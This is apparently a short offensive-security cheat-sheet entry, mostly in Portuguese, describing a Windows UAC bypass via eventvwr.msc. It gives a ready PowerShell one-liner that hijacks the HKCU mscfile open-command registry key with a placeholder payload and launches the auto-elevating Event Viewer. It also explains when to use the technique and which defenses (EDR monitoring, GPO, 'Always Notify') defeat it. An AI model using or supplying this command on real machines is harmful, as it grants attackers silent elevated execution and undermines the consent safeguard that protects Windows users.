UAC bypass eventvwr

New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force ; Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "<payload>" ; Start-Process "C:\Windows\System32\eventvwr.msc"

Bypass de UAC abusando de eventvwr.msc: sequestra a chave HKCU de mscfile para que o Visualizador de Eventos (assinado pela Microsoft) execute seu payload elevado.

Quando você tem uma sessão como usuário padrão e quer um processo elevado sem prompt UAC. eventvwr.msc é um binário assinado pela Microsoft que se auto-eleva; ao abri-lo, consulta o registro HKCU antes de HKLM, executando seu comando com token elevado.

Se o EDR monitora a chave mscfile em HKCU (assinatura muito conhecida) ou a auto-elevação está desabilitada por GPO. Em hosts com UAC em 'Always Notify' esta técnica falha (igual a fodhelper).